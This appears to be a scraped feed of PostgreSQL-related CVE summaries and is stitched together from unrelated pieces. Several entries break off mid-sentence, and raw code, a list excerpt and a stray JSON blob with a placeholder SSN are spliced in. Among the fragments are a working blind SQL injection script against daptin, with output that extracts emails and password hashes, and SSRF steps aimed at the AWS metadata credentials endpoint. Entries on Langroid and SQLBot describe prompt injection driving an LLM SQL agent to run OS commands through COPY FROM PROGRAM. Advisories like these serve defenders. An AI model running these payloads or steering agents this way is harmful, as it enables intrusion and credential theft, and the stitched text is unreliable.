PostgreSQL

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

Privilege escalation in PostgreSQL Anonymizer (all versions prior to 3.1.0) allows an authenticated database user to gain superuser privileges by embedding malicious SQL code within a column identifier of a user-created table. When a superuser invokes the k-anonymity function against such a table, the injected code executes with superuser-level privileges, yielding full confidentiality, integrity, and availability impact across the database. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though SSVC rates technical impact as total due to the complete privilege escalation outcome.

Supply chain compromise of SAP CAP Node.js database packages (@cap-js/sqlite 2.2.2, @cap-js/postgres 2.2.2, @cap-js/db-service 2.10.1) published on April 29, 2026 enables credential theft and self-propagation on developer and build machines. Malicious code in these npm packages harvests npm tokens, cloud provider credentials, SSH keys, and GitHub PATs from any host that installed them. No public exploit identified at time of analysis as a separate POC, since the malicious payload itself constituted in-the-wild distribution via npm registry.

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/15. ) Security Advisory: Multiple Vulnerabilities in llama.cpp GGUF Format Parsers (135266653@...com) CVE-2026-35194: Apache Flink: Remote code execution via SQL injection in code generation (Martijn Visser <martijnvisser@...che.org>) libpng-apng: Chunk-smuggling vulnerability in push-mode APNG parser: CVE-2026-40930 (Cosmin Truta <ctruta@...il.com>) netatalk 4.4.3 fixes 20 CVEs, leaves 18 for later (Alan Coopersmith <alan.coopersmith@...cle.com>) PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 Released with security fixes (Alan Coopersmith <alan.coopersmith@...cle.com>) Poppy: XPC Observability & Fault Injecti

Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.

Authenticated users in Mathesar 0.2.0 through 0.9.x can access metadata for PostgreSQL databases where they lack collaborator privileges, due to missing authorization checks in four API methods (collaborators.list, tables.metadata.list, explorations.list, forms.list). Exposed data includes table schemas, saved explorations, form configurations, and critically, public form submission tokens that grant unauthorized database write access under the form's PostgreSQL role. Fixed in version 0.10.0. CVSS 5.3 (Medium) reflects network-accessible, low-complexity exploitation requiring only basic authentication. No public exploit code or active exploitation detected (EPSS data unavailable, not in CISA KEV).

Broken access control in Mathesar 0.2.0 through 0.9.x allows authenticated users to read, modify, or delete saved explorations (database query definitions) in databases where they lack collaborator privileges. Exploitation requires only a valid user account and knowledge of an exploration ID - easily guessed or enumerated. Fixed in version 0.10.0. No public exploit identified at time of analysis, with EPSS data not available for this recently disclosed vulnerability.

Budibase servers before version 3.38.1 allow any authenticated application user to modify datasource connection parameters through the REST API endpoint PUT /api/datasources/:datasourceId, which requires only basic TABLE/READ permissions instead of builder-level access. This authorization bypass enables attackers with minimal BASIC role privileges to redirect PostgreSQL, MySQL, MongoDB, or REST datasources to arbitrary hosts and ports, creating server-side request forgery (SSRF) conditions that bypass existing HTTP-layer protections for SQL driver connections. The vulnerability has been assigned CVSS 8.8 (High) and is fixed in Budibase 3.38.1.

Local privilege escalation in Rapid7 Metasploit Pro allows unprivileged Windows users to achieve SYSTEM-level execution via OpenSSL configuration file hijacking. The metasploitPostgreSQL service loads openssl.cnf from a non-existent directory writable by standard users, enabling arbitrary command execution with SYSTEM privileges. Rated CVSS 8.5 (High) with proof-of-concept exploitation status (E:P). EPSS data not yet available. Not currently listed in CISA KEV catalog, suggesting vendor-disclosed rather than observed in-the-wild exploitation at time of analysis.

SQL injection in Marten's PostgreSQL full-text search APIs allows remote unauthenticated attackers to execute arbitrary database commands when applications pass user-controlled input to the regConfig parameter. The vulnerability affects all five search method overloads (SearchAsync, PlainTextSearchAsync, PhraseSearchAsync, WebStyleSearchAsync, PrefixSearchAsync) where the regConfig parameter is interpolated directly into SQL without validation. Confirmed exploit payloads demonstrate time-based blind extraction, information disclosure via SELECT statements, and DDL execution including table drops. Vendor-released patch available in Marten 8.37.0 via GitHub PR #4343. No public exploit identified at time of analysis, though the advisory includes working proof-of-concept payloads for all affected methods.

SQL injection in n8n's Source Control feature allows attackers with git repository write access to execute arbitrary SQL against the PostgreSQL backend when administrators pull malicious Data Table JSON files. The vulnerability requires a specific attack chain: attacker git repository access, Source Control feature enabled, PostgreSQL backend, and admin-triggered pull operation. Vendor-released patches are available across all affected version branches (1.x, 2.20.x, 2.21.x). No public exploit identified at time of analysis, and the multi-prerequisite exploitation path significantly limits real-world attack surface to supply chain or insider threat scenarios.

SQL injection in PostgreSQL logical replication ALTER SUBSCRIPTION REFRESH PUBLICATION allows authenticated local or network users with table creation privileges to execute arbitrary SQL queries with the publication subscriber's credentials. The attack is deferred until the next REFRESH PUBLICATION command is executed, requiring user interaction or scheduled maintenance. PostgreSQL 16.x, 17.x, and 18.x versions prior to 16.14, 17.10, and 18.4 respectively are vulnerable; earlier versions are unaffected. No public exploit code or active exploitation has been identified.

Stack buffer overflow in PostgreSQL's refint module allows low-privileged database users to execute arbitrary code as the database operating system user across all supported versions before 14.23, 15.18, 16.14, 17.10, and 18.4. The vulnerability enables two distinct attack paths: direct stack overflow leading to OS-level code execution, and SQL injection when applications expose user-controlled columns configured as refint cascade primary keys. With CVSS 8.8 (AV:N/AC:L/PR:L) and network-based exploitation requiring only low-privilege database credentials, this represents a critical privilege escalation risk for PostgreSQL deployments. No active exploitation (CISA KEV) or public POC identified at time of analysis.

Buffer over-read in PostgreSQL 18.0 through 18.3 allows authenticated table maintainers to infer sensitive memory contents by exploiting mismatched array lengths in the pg_restore_attribute_stats() function during query planning. The vulnerability requires authenticated database access and table maintenance privileges but enables information disclosure without modifying data or causing service disruption.

Denial of service in PostgreSQL allows remote unauthenticated attackers to crash the database server via recursive SSL/GSS negotiation when connecting to AF_UNIX or TCP sockets (if SSL and GSS are both disabled). Affects all PostgreSQL versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. No active exploitation confirmed (not in CISA KEV). Vendor-released patches available across all supported major versions. EPSS data not available, but CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates high availability impact with low barrier to exploitation.

Timing-channel attack in PostgreSQL MD5 password authentication enables remote unauthenticated attackers to extract user credentials through statistical analysis of authentication response times, affecting versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. The vulnerability exploits variable-time comparison operations during MD5 password hash verification, but does not impact the default scram-sha-256 authentication method. Databases migrated from PostgreSQL 13 or earlier may retain MD5-hashed passwords and remain vulnerable despite running newer versions.

PostgreSQL libpq client library allows malicious server superusers to execute arbitrary code on connecting clients by overwriting stack buffers via unbounded responses to PQfn() calls. The vulnerability affects lo_export(), lo_read(), lo_lseek64(), and lo_tell64() functions used by psql and pg_dump utilities. A compromised or malicious PostgreSQL server can exploit clients running these common administrative tools during routine operations like database backups or large object exports. EPSS and KEV data not available for this recent CVE. CVSS 8.8 reflects the network attack vector with user interaction requirement (connecting to malicious server).

SQL injection in PostgreSQL's pg_createsubscriber utility escalates privileges from pg_create_subscription to superuser, enabling arbitrary SQL execution. Affects PostgreSQL versions 17.0-17.9 and 18.0-18.3; exploitation requires high-privilege access (pg_create_subscription rights) but occurs remotely without additional complexity. Attack triggers when pg_createsubscriber next executes. Fixed in PostgreSQL 18.4 and 17.10. No CISA KEV listing or public exploit identified at time of analysis, but the technical simplicity (AC:L) and privilege escalation nature present moderate risk for multi-tenant or hosted PostgreSQL environments where subscription management permissions are delegated.

Symlink following vulnerabilities in PostgreSQL pg_basebackup and pg_rewind enable database superusers to overwrite arbitrary files on the destination server's filesystem, leading to local OS account takeover. Exploitation requires a malicious origin database superuser convincing an administrator to run these backup/replication tools (UI:R in CVSS), with practical impact limited to scenarios where database files are transferred between systems or snapshotted before server restart. No public exploit identified at time of analysis. CVSS 8.8 reflects theoretical severity, but real-world risk depends on specific operational workflows involving backup file transfers across trust boundaries.

Format string vulnerability in PostgreSQL timeofday() function allows authenticated remote attackers to read arbitrary server memory by supplying crafted timezone values. Affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. The vulnerability enables information disclosure of sensitive data stored in process memory without code execution or data modification capabilities.

Remote code execution in PostgreSQL (versions 14.x-18.x) allows authenticated database users to execute arbitrary code as the database operating system user via integer wraparound vulnerabilities in multiple server features. By passing gigabyte-scale inputs to affected database functions, attackers trigger allocation undersizing that leads to out-of-bounds writes. No active exploitation confirmed (not in CISA KEV), but CVSS 8.8 with network vector and low complexity indicates high exploitability once technical details become public. EPSS data not available at time of analysis.

Missing authorization in PostgreSQL CREATE TYPE allows authenticated users to hijack search_path resolution and force other database users to execute arbitrary SQL functions chosen by the attacker. An authenticated attacker can create a malicious user-defined type in a schema that appears earlier in a victim's search_path than legitimate extension or system types, causing the victim's queries to execute attacker-controlled functions instead of intended ones. This affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. While CVSS 5.4 is moderate, the attack requires authenticated database access and carries real risk in multi-tenant or shared PostgreSQL environments where privilege escalation or lateral movement is the goal.

SQL injection in the Elixir postgrex library allows local attackers with control over PostgreSQL LISTEN/UNLISTEN channel names to execute arbitrary SQL commands including DDL and DML operations. The Postgrex.Notifications module (versions 0.16.0 through 0.22.1) fails to escape double-quote characters in channel arguments, enabling attackers to break out of quoted identifiers and chain multi-statement payloads such as DROP TABLE commands. Vendor patch available in version 0.22.2 per GitHub advisory GHSA-r73h-97w8-m54h. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details and patch diff are publicly disclosed.

Prior to 2025-11-03, well-intended users of Terraform or REST API for Google Cloud AlloyDB for PostgreSQL could have created clusters with an insecure default password which could have been exploited by a remote attacker to gain full administrative access to the database. Exploitation required network access to the AlloyDB cluster and was limited to Terraform or the REST API, as other clients blocked it.

{ "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } }

Privilege escalation and OS command execution in CloudNativePG (CNPG) versions prior to 1.28.3 and 1.29.1 allow low-privileged PostgreSQL roles to gain superuser access and execute arbitrary commands inside the primary database pod. The metrics exporter connects as the postgres superuser and only demotes via SET ROLE, leaving session_user as superuser; an attacker who owns a database (including the default `app` role) can shadow unqualified identifiers like `current_database()` referenced in the stock `default-monitoring.yaml`, triggering the chain on the next scrape (≤30s). No public exploit identified at time of analysis, but the vulnerability is highly impactful (CVSS 9.4) and affects default deployments without custom metrics.

SQL injection in pgAdmin 4 Maintenance Tool allows authenticated users with tools_maintenance permission to execute arbitrary SQL and escalate to operating-system command execution on PostgreSQL database hosts. Four JSON fields (buffer_usage_limit, vacuum_parallel, vacuum_index_cleanup, reindex_tablespace) are concatenated unsafely into VACUUM/ANALYZE/REINDEX commands passed to psql. Attackers can break out of option syntax, inject SQL statements, and leverage PostgreSQL's COPY ... TO PROGRAM to achieve OS-level code execution. Fixed in version 9.15 via server-side allow-listing and proper input sanitization using qtIdent filter. EPSS data not available; no public exploit identified at time of analysis.

Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.

SQL injection in MikroORM versions ≤7.0.13 (v7) and ≤6.6.13 (v6) allows authenticated attackers to execute arbitrary SQL queries by injecting malicious characters into schema names, JSON property filters, or query builder keys. The vulnerability stems from improper escaping of dialect-specific quote characters in identifier-quoting and JSON-path functions. Multi-tenant applications are at heightened risk of cross-tenant data leakage. Vendor-released patches are available: upgrade to 7.0.14 (v7) or 6.6.14 (v6). No public exploit identified at time of analysis, though the vulnerability was discovered during internal security review by the project maintainer.

SQL injection vulnerability in pgx (Go PostgreSQL driver) prior to version 5.9.2 allows authenticated attackers to manipulate queries when the non-default simple protocol is used in conjunction with dollar-quoted string literals containing attacker-controlled placeholder-like text. The vulnerability requires specific configuration (simple protocol mode enabled) and precise SQL structure (dollar-quoted strings with embedded placeholder syntax), making exploitation unlikely in typical deployments but possible in applications explicitly using QueryExecModeSimpleProtocol.

SQL injection in PraisonAI's multi-backend conversation storage system allows authenticated attackers to execute arbitrary SQL commands. The incomplete fix for CVE-2026-40315 validated input only in SQLiteConversationStore, leaving nine other database backends (MySQL, PostgreSQL, Turso, SingleStore, Supabase, SurrealDB, and their async variants) vulnerable to f-string SQL injection via unvalidated table_prefix and schema parameters. 52 injection points exist across the codebase. Exploitable in multi-tenant deployments or API-driven configurations where table_prefix is derived from external input. Patches released in praisonai 4.6.9 and praisonaiagents 1.6.9 address all affected backends. EPSS and KEV data unavailable; no public POC confirmed at time of analysis.

{"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.

Authorization bypass in CKAN's datastore_search_sql function allows unauthenticated attackers to access private DataStore resources and extract PostgreSQL system information. CKAN versions prior to 2.10.10 and 2.11.0-2.11.4 are affected. The vulnerability exists in a feature that is disabled by default but can be enabled via configuration, limiting baseline exposure but creating significant risk for deployments that enable SQL search functionality.

A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5 Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with a [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. * Reported by Arvin Shivram of Brutecat Security

pgjdbc is an open source postgresql JDBC Driver. From version 42.2.0 to before version 42.7.11, pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue has been patched in version 42.7.11.

Remote code execution in H2O-3 versions 3.46.0.9 and earlier allows unauthenticated attackers to execute arbitrary code via the /99/ImportSQLTable REST API by abusing PostgreSQL JDBC driver parameters that bypass an incomplete MySQL-only parameter blacklist. No active exploitation is recorded in CISA KEV and EPSS is low (0.19%), but a vendor patch is available and SSVC marks exploitation status as POC, indicating proof-of-concept-grade attacker capability against a network-reachable endpoint.

SQL injection in Jellystat versions prior to 1.1.10 escalates to remote code execution on the PostgreSQL database host. Authenticated attackers can inject arbitrary SQL via multiple API endpoints (`/api/getUserDetails`, `/api/getLibrary`), initially exfiltrating sensitive credentials from the `app_config` table (including Jellystat admin credentials and Jellyfin API keys). Because the application uses node-postgres simple query protocol allowing stacked queries, attackers can leverage PostgreSQL's `COPY ... TO PROGRAM` to achieve command execution on the database server. The project's default docker-compose.yml deploys PostgreSQL with superuser privileges, removing any privilege barriers to RCE. Vendor patch released in version 1.1.10 (GitHub commit 735fe7c confirmed). No active exploitation confirmed by CISA KEV, but publicly available exploit code exists given the detailed technical disclosure in GitHub Security Advisory GHSA-fj7c-2p5q-g56m.

SQL injection in NocoBase's @nocobase/database package allows authenticated users with record-creation privileges to execute arbitrary SQL queries and extract database credentials. The vulnerability exists in the queryParentSQL() function, which constructs recursive Common Table Expression (CTE) queries using string concatenation instead of parameterized queries when processing tree collections with string primary keys. An attacker can inject malicious SQL by creating records with crafted primary key values, triggering the vulnerability when recursive eager loading occurs. Successful exploitation leads to full database compromise, with confirmed extraction of administrator credentials (emails and password hashes) in testing against PostgreSQL. On databases where the service account has elevated privileges, attackers can achieve operating system command execution via PostgreSQL's COPY...TO PROGRAM feature. Vendor patch available via GitHub PR #9133.

SQL injection in NocoBase plugin-collection-sql allows authenticated users with collection management permissions to bypass validation controls and execute arbitrary SQL queries. The checkSQL() function blocks dangerous keywords on collection creation and execution but is completely absent from the update endpoint, enabling attackers to create benign SQL collections then modify them with malicious queries to exfiltrate sensitive data including user credentials. Vendor patch available via GitHub PR #9134 and commit 851aee5. CVSS 7.2 reflects high privileges required (PR:H), but real-world impact is severe for environments where collection managers are not fully trusted administrators.

Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the order_by parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL injection, allowing any authenticated user to read, write, and destroy the full contents of the underlying PostgreSQL database through crafted ORDER BY expressions. This vulnerability is fixed in 1.5.0.

OpenBao 2.5.2 and earlier fails to properly quote PostgreSQL schema names during role revocation in the PostgreSQL database secrets engine, allowing authenticated high-privilege administrators to execute arbitrary SQL injection as the database management user. The vulnerability affects the credentials management workflow when revoking database roles, potentially compromising database integrity. A vendor-released patch (version 2.5.3) is available.

{ url: trim(url), // User-controlled, no validation method, headers, params, timeout, ...(method.toLowerCase() !== 'get' && data != null ? { data: transformer ? await transformer(data) : data } : {}), }); ``` The `url` at line 98 comes directly from user workflow configuration with only whitespace trimming. **`packages/plugins/@nocobase/plugin-action-custom-request/src/server/actions/send.ts` lines 172-198:** ```typescript const axiosRequestConfig = { baseURL: ctx.origin, ...options, url: getParsedValue(url, variables), // User-controlled via template headers: { ... }, params: getParsedValue(arrayToObject(params), variables), data: getParsedValue(toJSON(data), variables), }; const res = await axios(axiosRequestConfig); // No IP validation ``` - No `request-filtering-agent` or SSRF library (confirmed via grep across entire codebase) - No private IP range filtering - No cloud metadata endpoint blocking - No URL scheme validation - No DNS rebinding protection 1. Authenticated user creates a workflow with HTTP Request node 2. Sets URL to `http://169.254.169.254/latest/meta-data/iam/security-credentials/` 3. Triggers the workflow 4. Server fetches AWS metadata and returns IAM credentials in workflow execution logs Alternatively via Custom Request action: 1. Create custom request with URL `http://127.0.0.1:5432` or `http://10.0.0.1:8080/admin` 2. Execute the action 3. Server makes request to internal service - **Cloud metadata theft**: AWS/GCP/Azure credentials via metadata endpoints - **Internal network access**: Scan and interact with services on private IP ranges - **Database access**: Connect to localhost databases (PostgreSQL, Redis, etc.) - **Authentication required**: Yes (authenticated user), but any workspace member can create workflows

The SkyWalking OAP /debugging/config/dump endpoint may leak sensitive configuration information of MySQL/PostgreSQL. This issue affects Apache SkyWalking: from 9.7.0 through 10.3.0. Users are recommended to upgrade to version 10.4.0, which fixes the issue.

{ctx.languageCode}' THEN 2 WHEN '${ctx.channel.defaultLanguageCode}' THEN 1 ELSE 0 END`, 'sort_order', ) ``` TypeORM has no opportunity to parameterize this value because it is embedded directly into the SQL string before being passed to the query builder. The `languageCode` value can originate from the HTTP query string and is set on the request context for every incoming API request. The value is cast to the `LanguageCode` TypeScript type at compile time, but no runtime validation is performed -- the raw query string value is used as-is. An unauthenticated attacker can append a crafted `languageCode` query parameter to any Shop API request to inject arbitrary SQL into the query. No user interaction is required. The vulnerable endpoint is exposed on every default Vendure installation. **Upgrade to a patched version immediately.** If you cannot upgrade right away, apply the following hotfix to `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query: ```ts private getLanguageCode(req: Request, channel: Channel): LanguageCode | undefined { const queryLanguageCode = req.query?.languageCode as string | undefined; const isValidFormat = queryLanguageCode && /^[a-zA-Z0-9_-]+$/.test(queryLanguageCode); return ( (isValidFormat ? (queryLanguageCode as LanguageCode) : undefined) ?? channel.defaultLanguageCode ?? this.configService.defaultLanguageCode ); } ``` This replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead. The patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth.

Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c

Path traversal (Zip Slip) in gramps-web-api media archive import allows authenticated owner-privileged users to write arbitrary files outside intended directories via malicious ZIP archives. Exploitation requires owner-level access and enables cross-tree data corruption in multi-tree SQLite deployments or config file overwrite in volume-mounted configurations. Postgres+S3 deployments limit impact to ephemeral container storage. No public exploit identified at time of analysis.

Unauthenticated remote code execution (RCE) at root level in Aperi'Solve <3.2.1 allows attackers to execute arbitrary commands via unsanitized password input in JPEG upload functionality. Attack requires no authentication (PR:N) and low complexity (AC:L), with CVSS 9.3 critical severity. Publicly available exploit code exists via GitHub advisory. Attackers gain full container compromise with potential pivot to PostgreSQL/Redis databases and, in misconfigured deployments with Docker socket mounts, possible host system takeover. EPSS data not provided, but given unauthenticated network-based vector and public disclosure with fix details, exploitation risk is substantial for exposed instances.

SQL injection in Kestra orchestration platform's flow search endpoint (GET /api/v1/main/flows/search) enables remote code execution on the underlying PostgreSQL host. Authenticated users can trigger the vulnerability by visiting a malicious link, exploiting PostgreSQL's COPY TO PROGRAM feature to execute arbitrary OS commands on the Docker container host. Affects Kestra versions prior to 1.3.7 in default docker-compose deployments. With CVSS 9.9 (Critical) and low attack complexity requiring only low-privilege authentication, this represents a severe risk for container escape and host compromise scenarios.

JWT algorithm confusion in fast-jwt npm package allows remote attackers to forge authentication tokens with arbitrary claims by exploiting incomplete CVE-2023-48223 remediation. The vulnerability (CVSS 9.1 Critical) affects applications using RS256 with public keys containing leading whitespace-a common scenario in database-stored keys, YAML configurations, and environment variables. Attackers possessing the RSA public key (inherently public information) can craft HS256 tokens accepted as valid

{{$context.data.fieldName}}) directly into raw SQL statements, enabling attackers to break out of string literals and inject malicious SQL commands. Publicly available exploit code exists demonstrating UNION-based injection to extract database credentials and system information. With default Docker deployments granting superuser database privileges, attackers gain full read/write access to the database including credential extraction, data modification, and table deletion capabilities.

Stored XSS in DbGate npm package escalates to remote code execution in Electron desktop app via unsanitized SVG icon rendering. Attackers who inject malicious SVG payloads into application definition files can execute arbitrary JavaScript when victims view matching database entries. In the Electron desktop client, insecure configuration (nodeIntegration: true, contextIsolation: false) allows XSS payloads to invoke Node.js APIs, enabling local code execution including file system access. Web depl

SQL injection in Hi.Events open-source event management platform (versions 0.8.0-beta.1 through 1.7.0-beta) allows remote unauthenticated attackers to execute arbitrary SQL queries via unsanitized sort_by parameters passed to Eloquent's orderBy() method. The PostgreSQL backend supports stacked queries, enabling multi-statement injection. While CVSS 8.7 reflects high confidentiality impact and no authentication requirement, no public exploit code or CISA KEV listing exists at time of analysis. Vendor-released patch available in version 1.7.1-beta.

SQL injection in Alerta's Query string search API (q= parameter) allows unauthenticated remote attackers to execute arbitrary SQL commands against the underlying PostgreSQL database. The vulnerability stems from unsafe f-string interpolation of user-supplied search terms directly into SQL WHERE clauses without parameterization. Alerta versions prior to 9.1.0 are affected; the vulnerability has been patched in version 9.1.0 with no public exploit code identified at time of analysis.

SQL injection in SchemaHero 0.23.0 allows remote attackers to execute arbitrary SQL commands through the column parameter in the columnAsInsert function within the PostgreSQL plugin, potentially compromising database integrity and confidentiality. Public exploit documentation is available, indicating proof-of-concept code exists. CVSS and EPSS data are unavailable, limiting formal severity quantification.

DataRow.Decode in github.com/jackc/pgproto3/v2 fails to validate field length parameters, allowing a malicious or compromised PostgreSQL server to send a DataRow message with a negative field length that triggers a slice bounds out of range panic in Go applications using this library. Affected applications experience denial of service through unexpected termination when connecting to an untrusted or compromised database server. No public exploit code or active exploitation has been confirmed; however, the attack requires only network access to a PostgreSQL endpoint that the vulnerable application connects to.

SQL injection in n8n's Data Table Get node allows authenticated users with workflow modification permissions to execute arbitrary SQL queries against PostgreSQL backends, enabling data modification and deletion. Public exploit code exists for this vulnerability. Affected versions prior to 1.123.26, 2.13.3, and 2.14.1 should be upgraded immediately, or workflow creation/editing permissions should be restricted to trusted users only.

n8n workflow automation platform Community Edition contains an authorization bypass vulnerability allowing authenticated users with member-level privileges to steal plaintext credentials from other users. The flaw chains name-based credential resolution that doesn't enforce ownership with a permissions bypass affecting generic HTTP credential types (httpBasicAuth, httpHeaderAuth, httpQueryAuth). Attackers can decrypt and exfiltrate credentials without authorization, though native integration credentials remain unaffected.

Parse Server versions prior to 8.6.59 and 9.6.0-alpha.53 contain a SQL injection vulnerability in PostgreSQL aggregate operations that allows attackers with master key access to execute arbitrary SQL statements, escalating from application-level administrator privileges to database-level access. Only PostgreSQL-backed Parse Server deployments are affected; MongoDB deployments are not vulnerable. No CVSS score or EPSS data is currently available, and no KEV or active exploitation reports have been confirmed at this time.

